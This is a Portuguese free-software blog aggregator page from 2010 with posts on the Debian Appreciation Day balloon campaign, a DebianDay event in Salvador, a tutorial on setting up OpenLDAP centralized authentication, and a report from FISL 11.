Esse relato não seria possível se Ana B. Guerrero López não tive-se enviado um email sugerindo a criação de uma cartão comemorativo, assim como as estatísticas representadas no cartão não existiria se Tiago Vaz juntamente com ela não providencia-se a pesquisa. Porém o mais importante de tudo isso é que toda essa ação aconteceu de forma pró-ativa, não tivemos uma ordem de um patrão ou grande milionário para executar. Um pouco mais tarde, ainda agindo internamente, trocando emails em “modo surpresa”, tivemos relevantes considerações de Marga sobre a proposta inicial do cartão comemorativo o qual utilizaria uma das ilustrações feita por Davi Rohs, e bem próximo das últimas horas para postagem oficial me lembrei de algumas lindas ilustrações livres do OpenClipArt.org, sendo a origem do bolo feito por dstankie e os famosos balões feito por AJ, todas essas artes estão em domínio público e contribuíram muito para a composição da peça final. Sobre a composição, utilizei o Inkscape (Software Livre) para trabalhar os elementos, desagrupando, colocando espiral no bolo e nos balões.

Logo depois da publicação, rapidamente as pessoas através de microblogs estavam compartilhando diferentes links para o mesmo cartão que estava em diversos lugares da web, algo que talvez seja impossível dizer quantos e onde. Sei que o site oficial do Debian e até o do Ubuntu publicaram e eu até tentei descobrir outros grandes sites.

Sobre a construção do Thank.Debian.Net ou melhor do Debian Appreciation Day, bem acredito eu que o código já estava sendo desenvolvido alguns dias ou horas atrás por Marga, Maxy e Raphael, minutos depois da publicação do cartão comemorativo foi que pude contribui na construção de uma identidade visual, bem similar ao cartão para formar uma unidade de campanha e foi nessa hora que veio o verdadeiro insight dos balões flutuantes.

Sobre os balões flutuantes, bem, pedi ajuda alguns amigos para desenvolver um código novo e limpo em javascript mas eles estavam bastante ocupados e outros não responderam a tempo. Então fiz uma busca na web e achei uma versão livre, de um javascript antigo e bugado, porém funcionava como prova de proposta, então anunciei o link em um canal aberto no irc.debian.org e algumas pessoas começaram a copiar os balões bugados e colocar em seus blogs e assim depois identificamos o bug, qual passamos toda uma madrugada acordado (eu, pabs e marga) tentando solucionar a sujeira desse código, porém só mais tarde o Maxime LONGUET – ITIKA me enviou um email com patch para correção do bug e minutos depois Aurélio Heckert me enviou um código javascript totalmente novo, mais limpo, rápido e funcional. Foi ai que intensificou a divulgação em microblogs e muitos sites, portais e blogs estavam utilizando os balões flutuantes quais ao clicar redirecionava para o Thank.Debian.Net, até o wiki.debian.org e bugs.debian.org ganharam balões flutuantes.
Porém algumas pessoas já estavam blogando que os balões estavam atrapalhando o bugs.debian.org e que essas mesmas pessoas não sabiam desabilitar o javascript ou esperar algumas horas para voltar tudo ao normal… Enfim, elas não estavam gostando da Festa do Debian. Porém outras pessoas estavam blogando muito feliz e alguns sites estavam comentando como sendo uma coisa legal os balões flutuantes do bugs.debian.org. Então resta analisar e saber o quanto isso beneficiou a comunidade. Logo abaixo um registro pessoal de alguns grandes blogs, portais e sites que utilizaram os balões:

Dentre os sites acima destaca-se: O blog de desenvolvedor(es) Debian, o site pessoal de colaborador(es) e usuário(s) Debian, assim como o portal da Revista Espirito Livre, qual tem um grande reconhecimento no Brasil, o perfil de usuários na maior rede social brasileira de Software Livre e muitos outros… Quer ver?

Os números que tenho:
216.679 requisições, sendo 10 arquivos (9 balões e 1 arquivo javascript), dá um total de 21.667 visualizações!
Aqui você tem um resumo dessas estatísticas.

O Thank.Debian.Net teve mais de 3000 agradecimentos recebidos, porém como comentado por Marga é possível que muitos se sentiram ainda tímidos para deixar um registro, na verdade eu acredito que a dificuldade encontrada pode ter sido porque o site era somente em idioma Inglês. Enfim, mas considero um registro muito significante para uma campanha realizada em menos de 72 horas.

Para finalizar a postagem, gostaria de dizer que essa grande Festa do Debian na Internet foi algo bem similar com a grande festa do Debian Brasil que realizamos uma vez por ano no FISL. Quem já veio a esse evento e participou dessa festa, sabe que temos muitos balões, muita comemoração. Até Maddog já foi a festa do Debian no FISL.

Agora fica o convite para pensar em uma grande festa na web do lançamento da próxima release conhecida como “Squeeze”.

E para quem chegou até aqui viu que não é somente mérito meu, mas de muitas pessoas que passaram noites do dia 14, 15 e 16 desse mês de agosto, programando, desenhando ou blogando sobre a grande Festa que é a comunidade Debian. Sinto muito orgulho de fazer parte dessa família há mais de 10 anos.

:D



Debian, Feliz Aniversário! 17 anos de comunidade e projetos!

16 de Agosto de 2010, 0:00, por Software Livre Brasil - 0sem comentários ainda

Cartão Números do Debian

Cartão feito por mim utilizando Inkscape e alguns cliparts livre do OpenClipart.org.

Participe também do viral “Balões do Debian em seu site”, acesse aqui e cole o código em seu blog ou site.



Debian, Feliz Aniversário! 17 anos de projeto e comunidade!

16 de Agosto de 2010, 0:00, por Software Livre Brasil - 0sem comentários ainda


Cartão feito por mim utilizando Inkscape e alguns cliparts livre do OpenClipart.org.

Participe também do viral "Balões do Debian em seu site", acesse aqui e cole o código em seu blog ou site.



DebianDay em Salvador Bahia

12 de Agosto de 2010, 0:00, por Software Livre Brasil - 0sem comentários ainda

Galera só para lembrar, nesse sábado temos DebianDay aqui em Salvador, na UFBA, Departamento de Computação, Sala 151 (na verdade vai ser na 154, mas fica uma do lado da outra).

Quem estive afim de fazer mais pelo Debian, compareça! Os derivados do Debian também são beneficiados e bem-vindos!

Site do evento: wiki.debianbrasil.org/GUD/BA



Venha fazer mais pelo Debian (Debian Day Salvador)

8 de Agosto de 2010, 0:00, por Software Livre Brasil - 0sem comentários ainda

Você que é um hacker, sedento por conhecimento e com interesse em colaborar com um projeto de Software Livre sério, junte-se a nós no Debian Day!


Nesse dia iremos comemorar o 17o. aniversário do projeto Debian e mostrar como funciona nossa comunidade. Assim, você que não sabe nada sobre ela poderá ajudar.

Você que sempre usou produtos da comunidade, agora poderá colaborar com ela! Venha e una-se a outros hackers soteropolitanos.

Venha ajudar a empacotar, traduzir, documentar, desenhar ou compartilhar conhecimento com mais alguns hackers.

Data 14/08/10 (Esse sábado)
Local Sala 151 no Instituto de matemática da UFBA (Siga as placas!)
Convite e programação: http://yfrog.com/f/jnuzup/
Wiki : http://wiki.debianbrasil.org/GUD/BA/DiaDebian2010BaSalvador



Implantando autenticação centralizada e segura usando Openldap

31 de Julho de 2010, 0:00, por Software Livre Brasil - 0sem comentários ainda

Openldap

Uma autenticação centralizada faz parte do processo de adequação do ambiente as boas práticas de segurança. Esta solução provê recursos que atendem aos principios de autenticidade e não-repúdio. Usando a criptografia juntamente com esta solução poderemos previnir ataques de hijacking, spoofing e man in the middle.

O LDAP (Lightweight Directory Access Protocol) é um protocolo cliente-servidor, utilizado para acessar um serviço de Diretório. Ele foi inicialmente usado como uma interface para o X.500, mas também pode ser usado com autonomia e com outros tipos de servidores de Diretório. Atualmente vem se tornando um padrão, diversos programas já têm suporte a LDAP. Livros de endereços, autenticação, armazenamento de certificados digitai
s (S/MIME) e de chaves públicas (PGP), são alguns dos exemplos onde o LDAP já é amplamente utilizado.

O Openldap é a solução livre para a implementação do LDAP. Diferentemente das soluções proprietárias ( e.g. Active Directory ™ ), ele implementa de forma fidedigna as especificações das RFCs deste protocolo.

Este artigo têm como principal objetivo ensinar como implantar uma solução livre e gratuita de autenticação com segurança. Não abordarei conceitos sobre o funcionamento do protocolo, para isso recomendo a leitura das referências.

Inicialmente irei configurar um servidor LDAP e um cliente autenticando nesta base. Os próximos artigos apresentarei como integrar outros serviços com HTTP ( Apache ), Proxy ( Squid ) , Email ( Postfix + Dovecot ) ao serviço de diretório.

Divirtam-se!!

= Configurando o LDAP server ==

Instale os pacotes necessários

aptitude install slapd ldap-utils migrationtools

dpkg-reconfigure slapd

DNS domain name: acme.local
Organization name: acme
Database backend to set: HDB
Do you want the database to be removed when slapd is purged? No
Move old database? Yes
Allow LDAPv2 protocol? Yes

== Adicionando Schemas ==

Acesso o diretório /etc/ldap/schemas

cd /etc/ldap/schemas

Faça o download dos schemas. Eles serão importantes na implementação do kerberos e na autenticação dos usuários do Postfix

wget http://www.bayour.com/openldap/schemas/krb5-kdc.schema

wget http://trac.kyapanel.com/export/360/trunk/ldap/schema/qmailuser.schema

Edite o arquivo /etc/ldap/slapd adicionando os novos schemas e novos indices no index

vim /etc/ldap/slapd.conf

include /etc/ldap/schema/krb5-kdc.schema
include /etc/ldap/schema/qmailuser.schema

index objectClass,ou,cn,sn,uid,uidNumber,mail,mailAlternateAddress,mailForwardingAddress,memberUid eq

Reinicie o slapd

invoke-rc.d slapd restart

== Testando ==

ldapsearch -x -b “dc=acme,dc=local”

# extended LDIF
#
# LDAPv3
# base with scope subtree
# filter: (objectclass=*)
# requesting: ALL
#

# acme.local
dn: dc=acme,dc=local
objectClass: top
objectClass: dcObject
objectClass: organization
o: acme
dc: acme

# admin, acme.local
dn: cn=admin,dc=acme,dc=local
objectClass: simpleSecurityObject
objectClass: organizationalRole
cn: admin
description: LDAP administrator

# search result
search: 2
result: 0 Success

# numResponses: 3
# numEntries: 2

== Migrando os usuários e grupos locais com o migration tools ==

O migrationtools é um conjunto de scripts responsáveis por migrar as informações locais como hosts, serviços, usuários, grupos e etc para a infraestrutura do LDAP.

Edite as seguintes linhas do arquivo /usr/share/migrationtools

vim migrate_common.ph

$DEFAULT_MAIL_DOMAIN = “acme.local”;

$DEFAULT_BASE = “dc=acme,dc=local”;

$EXTENDED_SCHEMA = 1;

Importe a base

./migrate_base.pl > base.ldif

O arquivo base.ldif contém a infraestrutura básica de OUs ( Unidades Organizacionais ). Como o objetivo de nosso LDAP é autenticação então edite o arquivo base.ldif deixando somente as seguintes informações:

dn: dc=acme,dc=local
dc: acme
objectClass: top
objectClass: domain
objectClass: domainRelatedObject
associatedDomain: acme.local

dn: ou=People,dc=acme,dc=local
ou: People
objectClass: top
objectClass: organizationalUnit
objectClass: domainRelatedObject
associatedDomain: acme.local

dn: ou=Group,dc=acme,dc=local
ou: Group
objectClass: top
objectClass: organizationalUnit
objectClass: domainRelatedObject
associatedDomain: acme.local

Migre as contas e as senhas dos usuários

ETC_SHADOW=/etc/shadow ./migrate_passwd.pl /etc/passwd > passwd.ldif

Migre os grupos

./migrate_group.pl /etc/group > group.ldif

== Atualize o BD do LDAP ==

ldapadd -h localhost -x -W -D “cn=admin,dc=acme,dc=local” -c -f base.ldif

ldapadd -h localhost -x -W -D “cn=admin,dc=acme,dc=local” -c -f passwd.ldif

ldapadd -h localhost -x -W -D “cn=admin,dc=acme,dc=local” -c -f group.ldif

== Testando ==

ldapsearch -LL -H ldap://localhost -b”dc=acme,dc=local” -x “(uid=alexos)”

dn: uid=alexos,ou=People,dc=acme,dc=local
uid: alexos
cn: alexos
sn: alexos
mail: alexos@acme.local
objectClass: person
objectClass: organizationalPerson
objectClass: inetOrgPerson
objectClass: posixAccount
objectClass: top
objectClass: krb5Principal
objectClass: shadowAccount
shadowMax: 99999
shadowWarning: 7
krb5PrincipalName: alexos@ACME.LOCAL
loginShell: /bin/bash
uidNumber: 1000
gidNumber: 1000
homeDirectory: /home/alexos
gecos: alexos,,,

Referências:

Andreaswacker
Linsec.ca
Openldap.org

Continua….



FISL 11 e Porto Alegre

26 de Julho de 2010, 0:00, por Software Livre Brasil - 0sem comentários ainda

De 20 a 24 de julho, participei da 11ª edição do Fórum Internacional de Software Livre. O FISL esse ano me agradou mais do que a edição anterior. Percebi uma diversidade maior de temas na programação e acho que consegui escolher melhor as palestras do que no ano passado.

Assisiti boas palestras sobre HTML5, ministradas pela equipe da Fundação Mozilla, os quais mostraram alguns recursos que o HTML5 + javascript proporciona para o vídeo na web. Por falar em javascript, acho que essa é uma linguagem que vale a pena estudar atualmente, pois abre muitas possibilidades quando usada com o HTML5.

Encontro LGM Brasil

Um momento importante do FISL, foi o encontro LGM Brasil, que reuniu algumas pessoas que colaboram/trabalham com softwares gráficos livres. Um dos temas discutidos foi a possibilidade de realizar o encontro LGM Internacional no Brasil em 2012. Consideramos que, a menos que consigamos um forte apoio de algum orgão estatal, seria muito difícil realizar o encontro aqui, pois boa parte dos desenvolvedores vivem na Europa e América do Norte. Como o custo das passagens é bastante alto e seria prejudicial para o LGM se muitos desenvolvedores não conseguirem vir. Além do encontro, a programação contou com várias palestras sobre os softwares gráficos.

Além disso, vi uma excelente palestra sobre o Open Street Map, um projeto colaborativo para a criação de mapas sob licenças livres . O mapeamento pode ser feito por meio de um aparelho GPS ou pelo site do projeto, com base nas fotos de satélite que o Yahoo disponiblizou. Em cidades como Berlin e Londres, as informações do Open Street Map são mais completas do que as do Google Maps. O OSM foi a principal fonte de informação para as equipes humanitárias que atuaram no Haiti após o terremoto. Em apenas 48 horas, pessoas do mundo todo ajudaram a mapear grande parte da região atingida pelo terremoto.

Mesa - Licenciamento de Software Livre
Foi muito boa também a palestra do JS sobre DRM, as mesas “Professor, um jeito hacker de ser”, composta por Nelson Pretto, Sérgio Amadeu e Adriano Teixeira, e a de licenciamento de software livre, as lightning talks do pessoal da #horaextra, entre outras…

Em Porto Alegre, não consegui visitar muitos lugares, pois a programação diária do FISL foi de 12h. Este ano, o clima estava menos frio do que no ano passado. O ruim foi que nos dois primeiros dias choveu bastante e o sol praticamente não apareceu. Como fiquei hospedado no centro da cidade caminhei bastante por lá e aproveitei para conhecer o mercado público (mas esqueci de fazer fotos). Quando eu retornar da Argentina e Uruguai, pretendo passar pelo menos um dia andando por PoA.